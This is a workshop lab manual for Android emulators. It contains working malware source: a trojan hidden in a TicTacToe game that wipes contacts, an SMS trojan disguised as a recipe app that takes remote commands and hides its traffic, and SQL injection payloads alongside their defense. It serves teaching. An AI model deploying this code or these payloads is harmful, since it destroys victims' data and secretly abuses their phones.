NSF Mobile Security Workshop 2014


Lab 3 Malware Game – Step by Step demonstration





In this lab, we will practice injecting malicious code into a benign TicTacToe game. The malicious code periodically erases all the contacts on the device.
Step 1: Start an emulator and Add Contacts
In Eclipse, follow the steps in the screenshot below to start an Emulator using AVD “Test”

The emulator may take several minutes to start.

After it starts, click the button in the middle to see the apps installed on the device.

Click “Contacts” to check the contact list on the device.

At first the contact list is empty. Click “Menu” in the right panel, and then click the “New Contact” button to create a new contact.




Enter the name for a new contact and press done.




Now you should see the new contact in your contact list.

Step 2: Load the benign TicTacToe Game into Eclipse
The Eclipse project “MalTicTacToe” under the folder

“\Lab3\Before Injecting Malicious Code\”

contains a benign TicTacToe game. Import the project into Eclipse.

In Eclipse, click “File” -> “Import”




In the “Import” dialog, select “Android” -> “Existing Android Code into Workspace”, and then click “Next”

Browse to the folder “MalTicTacToe” under “Lab3\Before Injecting Malicious Code\”.

Check “Copy Projects into workspace” and click “Finish” to complete the import.



The imported project would look like the screenshot below.


Step 3: Install the benign TicTacToe to the emulator

The game will start automatically, and you can play the TicTacToe game.

Check the contact list (refer to Step 1); the previously created contact should still exist.

Close the emulator and start it again; the contact list should remain unchanged.



Step 4: Inject Malicious Code
Open the configuration file: AndroidManifest.xml

Add permission requests (orange color) and two Receiver components (blue color) to the AndroidManifest.xml
Code 3.1


package="android.trojangame"
android:versionCode="1"
android:versionName="1.0" >

android:minSdkVersion="8"
android:targetSdkVersion="10" />

android:allowBackup="true"
android:icon="@drawable/ic_launcher"
android:label="@string/app_name"
android:theme="@style/AppTheme" >

android:name="edu.mobilesecuritylabware.malware.maltictactoe.tictactoe.MainActivity"
android:label="@string/app_name" >

Next, we will add the Java code for the two new components.

Create a new package with the name “edu.mobilesecuritylabware.malware.maltictactoe.trojan”






Add a new Java class “RunTrojan” to the new package




Repeat the same steps to add another class “StartAttack” to the new package.


Replace the code in RunTrojan.java with Code 3.2
Code 3.2
package edu.mobilesecuritylabware.malware.maltictactoe.trojan;

import android.app.Activity;
import android.content.BroadcastReceiver;
import android.content.ContentResolver;
import android.content.Context;
import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.provider.ContactsContract;
import android.util.Log;

public class RunTrojan extends BroadcastReceiver {

    @Override
    public void onReceive(Context context, Intent intent) {
        Log.i("LOG", "deleteContacts");
        ContentResolver contentResolver = context.getContentResolver();
        // Walk the contact list and delete each entry through its lookup URI.
        Cursor cursor = contentResolver.query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null);
        while (cursor.moveToNext()) {
            String lookupKey = cursor.getString(cursor.getColumnIndex(ContactsContract.Contacts.LOOKUP_KEY));
            Uri uri = Uri.withAppendedPath(ContactsContract.Contacts.CONTENT_LOOKUP_URI, lookupKey);
            Log.i("LOG", uri.toString());
            contentResolver.delete(uri, null, null);
        }
    }
}

Replace the code in StartAttack.java with Code 3.3
Code 3.3
package edu.mobilesecuritylabware.malware.maltictactoe.trojan;

import java.util.Calendar;

import android.app.AlarmManager;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;

public class StartAttack extends BroadcastReceiver {

    private static final long TIME = 5000; // repeat interval in milliseconds
    Calendar cal = Calendar.getInstance();
    private static int count = 0;

    @Override
    public void onReceive(Context context, Intent arg1) {
        Log.i("StartAttack", "onReceive");
        AlarmManager service = (AlarmManager) context
                .getSystemService(Context.ALARM_SERVICE);
        // Schedule a repeating broadcast that triggers RunTrojan.
        Intent i = new Intent(context, RunTrojan.class);
        PendingIntent pending = PendingIntent.getBroadcast(context, 0, i,
                PendingIntent.FLAG_CANCEL_CURRENT);
        service.setInexactRepeating(AlarmManager.RTC_WAKEUP,
                cal.getTimeInMillis(), TIME, pending);
        Log.i("StartAttack", count++ + " times");
    }

}

Step 5. Remove the Previously Installed Benign TicTacToe


In the emulator, open “Settings” -> “Applications” -> “Manage Applications” -> “TrojanGame” -> “Uninstall”




Step 6. Install the TicTacToe with the malicious code
In Eclipse, install MalTicTacToe to the emulator (refer to Step 3).

After the installation, the main activity of the malicious TicTacToe will be invoked.

Play the game and exit the game.

Check the contacts. The contact list should remain unchanged.



Close the emulator and start the emulator again.

Check the contacts. All contacts shall be removed.



You can add contacts again (refer to Step 1), and they shall be quickly removed.


Lab 4 Malware-Trojan


Objective

In this lab, we will develop an Android Trojan from scratch to demonstrate the concept of mobile malware on the Android platform. The main function of this Android Trojan is to send text messages to others according to a hacker's commands. To keep the user unaware of the malicious activity, the Trojan deletes all the messaging history. The diagram below illustrates the workflow of this Android Trojan.

trojan diagram

Special Notice



The Android Trojan developed in this lab is for educational purposes. Readers should act in accordance with hacking ethics and should not spread or use the code in this lab to harm other Android phone users for their own benefit. A more thorough specification of hacking ethics can be found here and here. Please read them carefully.

The Development of the Android Trojan


This Trojan is disguised as an introduction to an Asian dish, Hong Shao Shi Zi Tou. We assume that the victim is interested in Asian food and has carelessly downloaded this app.
When the victim activates the application, the Trojan sends a notification to the hacker that encodes the user's IP address and a port number for malicious communication. The Trojan and the hacker can then set up a TCP/IP communication channel, through which the hacker sends commands to the Trojan on the victim's device. When it receives a command from the hacker, the Trojan parses the data packet, extracts the target users' phone numbers and the content of the malicious message, and sends the malicious messages to the target phone users. After sending the text messages, the Trojan deletes the messaging history. If the target phone users send complaint messages back to the user, the Trojan blocks those complaint messages from reaching the user's phone.
Step 1:

Start Eclipse. Import the pre-lab 4.

  • Click “File” -> “Import”.

  • Browse to the directory of downloads.

  • Select Lab 4

  • Pre-lab 4 is located under the Lab 4 folder.

Step 2:

  • Go to MalRecipe

  • Open the src folder

  • Open the edu.mobilesecuritylabware.malware.malrecipe.attack package

  • Open the class MainActivity.java

  • Go to the method called startServer()

  • Paste the following code, Code 4.1, into the area marked with comments that tell you to paste here. Do not include the line Code 4.1.

Code 4.1

serverSocket = new ServerSocket(PORT);
            //mSocket=new Socket(SERVER,PORT);
            while (true) {
                Socket client = serverSocket.accept();
                Log.i("VICTIM", "visting..");
                try {
                    // Log.i("hehheh", "visting..");
                    BufferedReader in = new BufferedReader(
                            new InputStreamReader(client.getInputStream()));
                    String str = in.readLine();
                    String[] tempMessage = str.split("#");
                    String phoneNo = tempMessage[0];
                    String message = tempMessage[1];
                    Log.i("AndroidServer", "No:" + phoneNo + " message:"
                            + message);
                    // Toast.makeText(MainActivity.this,"No:"+phoneNo+" message:"+message,
                    // Toast.LENGTH_SHORT).show();
                    sendSMS(phoneNo, message);// send message to target
                    deleteSMS();
                } catch (Exception e) {
                    e.printStackTrace();
                } finally {
                    client.close();
                }
                Thread.sleep(1000);
            }

After step 2, the code should look like this.



Step 3:

  • Go to MalRecipe

  • Open the src folder

  • Open the edu.mobilesecuritylabware.malware.malrecipe.attack package

  • Open the class SMSReceiver.java

  • Paste the following code, Code 4.2, into the area marked with comments that tell you to paste here. Do not include the line Code 4.2.

Code 4.2

    public void onReceive(Context context, Intent intent) {
        Log.i("SMSReceiver, isOrderedBroadcast()="
                    ,""+isOrderedBroadcast());
        String action = intent.getAction();
        if (SMS_RECEIVED_ACTION.equals(action)) {
            Bundle bundle = intent.getExtras();
            if (bundle != null) {
                Object[] pdus = (Object[]) bundle.get("pdus");
                for (Object pdu : pdus) {
                    SmsMessage message = SmsMessage.createFromPdu((byte[]) pdu);
                    String sender = message.getOriginatingAddress();
                    if (sender!=null&&sender.equals("15555215556")) {
                        //deleteSMS(context,sender);
                        abortBroadcast();
                    }
                    return;
                }
            }
            abortBroadcast();
        }
    }

This is what you will have in SMSReceiver.java after step 3





Step 4:

  • Go to AndroidManifest.xml file

  • Open the AndroidManifest.xml file

  • Paste the following code, Code 4.3, into the area marked with comments that tell you to paste here. Do not include the line Code 4.3.

Code 4.3
             android:permission="android.permission.BROADCAST_SMS"
             >

Your screen should look like this after step 4.


Lab 4 Step-by-Step Demonstration


Step 1: start two emulators

In Eclipse, open the “Android Virtual Device (AVD) Manager” by clicking its icon; two virtual devices (“Test” and “Test2”) have already been created.

Select “Test” and click the “Start” button to start the emulator “Test”.

Select “Test2” and click the “Start” button to start the emulator “Test2”.



Since we start the emulator “Test” first, it will be assigned port “5554”, and the other emulator, “Test2”, will be assigned port “5556”.




Step 2: install the MalRecipe app in emulator “5554:Test”

In eclipse,



By default, MalRecipe will be installed to the first emulator, which is “5554:Test”.


After the installation, we will see the MalRecipe app installed with the app name “Trojan”.



Start MalRecipe by clicking the app “Trojan”.



After the app starts, MalRecipe listens on port “7777” of emulator “5554:Test”.

Step 3: Start the MalRecipeServer

In Eclipse, start the “MalRecipeServer” as a Java Application.





The GUI of MalRecipeServer will look like this.



For the MalRecipeServer to be able to connect to port “7777” in emulator “5554:Test”, a TCP redirection needs to be set up.

Open PuTTY




Telnet to the emulator “5554:Test”



The following window will appear


Enter the command “redir add tcp:7777:7777”



Step 5: Attacking

In MalRecipeServer, enter the message to be sent through “5554:Test” to “5556:Test2”



Click “Attack”. If it succeeds, a message will be shown.


Check the SMS messages in the two emulators. We can see that “5556:Test2” received a message from “5554:Test”; however, “5554:Test” has no record of sending the message.


Lab 5 Database Security

SQL injection and defense


In this tutorial, we will create a simple SQL injection application based on Android's SQLite databases. By doing this exercise, students will gain a better understanding of security vulnerabilities in databases.

Objective



Android offers five options for data storage (Shared Preferences, Internal Storage, External Storage, SQLite Databases, Network Connection). Our goal is to fully understand how SQLite databases are used to store structured data in a private database and how SQL injection can be performed.

Software Requirement

Eclipse IDE

Android SDK

Tutorial

Open Eclipse

Import lab 5 from the downloads folder

Launch an emulator

Select SQLInjection app from the list on the left

Click Run As -> Android Application



Slide to unlock phone

The following should show on your phone.



Click the View Injection Demo button.

When you see this screen, type 1' or '1'='1 into the Input the user ID: field.



Click Search

You should see the following results


Now click the back button to return to the original screen.

In the Input the user ID: field, type 1' or username not null --

Click the Search button again and you should view the following:

To demonstrate the defense:

Click the back button to return to the original screen.



Now, click on the View Defense Demo

You should again reach the screen where you are asked to input the user ID.

We will now again try to enter 1' or '1'='1 in the Input the user ID: field.

When you run this time, the operation will fail and you should see the following results.

Notice that you were not able to capture the information.



You can click back and repeat the exercise using 1' or username not null -- as the ID.
For the code that performs all of these operations and an explanation, please see the bound workshop manual.
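
The difference between the injection demo and the defense demo can be reproduced outside the emulator. The following is an added example, not the lab app's code: it uses Python's sqlite3 module (the same SQLite engine Android uses), a constructed users table whose columns are assumptions, and the two tutorial inputs typed with straight quotes and a -- comment marker.

```python
import sqlite3

# Constructed sample data; the lab app's real schema is not shown on the page.
ROWS = [("1", "admin", "admin-pw"), ("2", "alice", "alice-pw"), ("3", "bob", "bob-pw")]

def make_db():
    """Return an in-memory SQLite database holding the constructed user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id TEXT PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db

def search_vulnerable(db, user_id):
    """Injection-demo style: the input becomes part of the SQL text itself."""
    sql = "SELECT id, username FROM users WHERE id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, user_id):
    """Defense style: the input is bound as a value and never parsed as SQL."""
    return db.execute("SELECT id, username FROM users WHERE id = ?", (user_id,)).fetchall()

def compare(inputs):
    """Map each input to (row count from concatenated query, row count from bound query)."""
    db = make_db()
    try:
        return {text: (len(search_vulnerable(db, text)),
                       len(search_parameterized(db, text))) for text in inputs}
    finally:
        db.close()

# A legitimate ID followed by the two inputs used in the tutorial.
TUTORIAL_INPUTS = ["1", "1' or '1'='1", "1' or username not null --"]

if __name__ == "__main__":
    for text, (leaky, bound) in compare(TUTORIAL_INPUTS).items():
        print(f"{text!r:32} concatenated: {leaky} row(s)   parameterized: {bound} row(s)")
```

On Android, the same binding is done by putting a ? placeholder in the query and passing the value in the selectionArgs array of SQLiteDatabase.rawQuery() or query().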
